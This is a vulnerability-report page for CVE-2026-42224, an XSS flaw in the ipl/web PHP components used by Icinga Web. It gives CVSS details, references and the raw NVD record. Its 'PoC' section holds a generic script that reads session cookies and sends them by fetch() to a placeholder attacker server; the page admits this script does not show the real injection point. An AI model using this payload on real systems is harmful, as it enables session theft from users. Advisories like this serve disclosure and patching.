Security Vulnerability Report
CVE-2026-42224 CVSS 7.6 HIGH

Published: 2026-05-08 23:16:36
Last Modified: 2026-05-08 23:16:36

Description

ipl/web is a set of common web components for PHP projects. Prior to version 0.13.1, the vulnerability allows an attacker to inject malicious JavaScript into a victim's browser and run it in the context of Icinga Web. The victim needs to visit a specifically prepared website and may have no immediate chance to notice any wrongdoing. This issue has been patched in version 0.13.1.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No NVD configuration data available.

Affected: ipl/web < 0.13.1 (fixed in 0.13.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a generic XSS payload that illustrates script execution in the Icinga Web context; it does not by itself show the injection point in ipl/web, which is not described on this page.
html
<!-- Proof of Concept for CVE-2026-42224 -->
<!-- Description: Simple XSS payload to demonstrate script execution in ipl/web context -->
<script>
  // Malicious JavaScript payload
  // This demonstrates the ability to execute code in the victim's browser context
  console.log('CVE-2026-42224 Exploited: ipl/web XSS');

  // Example: Exfiltrate session cookies
  var cookies = document.cookie;
  var attackerUrl = 'https://attacker-controlled-server/log?c=' + encodeURIComponent(cookies);

  // Send data to attacker
  fetch(attackerUrl);

  alert('XSS Triggered in ipl/web');
</script>

Weakness
CWE-79

References

https://github.com/Icinga/ipl-web/commit/f387e92504d7a03bb857d1aee9b7410e06dd065d
https://github.com/Icinga/ipl-web/releases/tag/v0.13.1
https://github.com/Icinga/ipl-web/security/advisories/GHSA-55wf-5m3q-6jjf
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42224",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T23:16:35.990",
    "lastModified": "2026-05-08T23:16:35.990",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ipl/web is a set of common web components for php projects. Prior to version 0.13.1, the vulnerability allows an attacker to inject malicious Javascript into a victim's browser to run it in the context of Icinga Web. The victim needs to visit a specifically prepared website and may have no immediate chance to notice any wrongdoing. This issue has been patched in version 0.13.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Icinga/ipl-web/commit/f387e92504d7a03bb857d1aee9b7410e06dd065d",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Icinga/ipl-web/releases/tag/v0.13.1",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Icinga/ipl-web/security/advisories/GHSA-55wf-5m3q-6jjf",
        "source": "[email protected]"
      }
    ]
  }
}